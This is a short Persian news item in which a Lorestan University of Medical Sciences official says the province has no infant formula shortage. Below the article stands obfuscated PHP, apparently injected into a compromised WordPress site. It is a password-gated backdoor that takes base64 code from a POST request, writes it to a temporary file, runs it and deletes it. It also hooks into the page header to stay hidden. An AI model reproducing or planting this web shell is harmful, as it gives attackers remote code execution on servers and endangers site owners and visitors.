معاونت غذا ودارو دانشگاه علوم پزشکی لرستان: کمبود شیرخشک در استان نداریم

معاونت غذا ودارو دانشگاه علوم پزشکی لرستان: کمبود شیرخشک در استان نداریم

خرم‌آباد- معاون غذا و دارو دانشگاه علوم پزشکی لرستان علت کمبود شیرخشک کودک در داروخانه‌های این استان را تشریح کرد.جواد قاسمیان یادگاری با اشاره به موضوع کمبود شیرخشک در استان لرستان، اظهار داشت: شیرخشک هایی که ما در استان داریم شامل شیرخشک های تغذیه‌ای و همچنین شیرخشک های خاص هستند ...

  • تغییر کیفیت نمایش
    • 1402/02/29
    دریافت

    if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}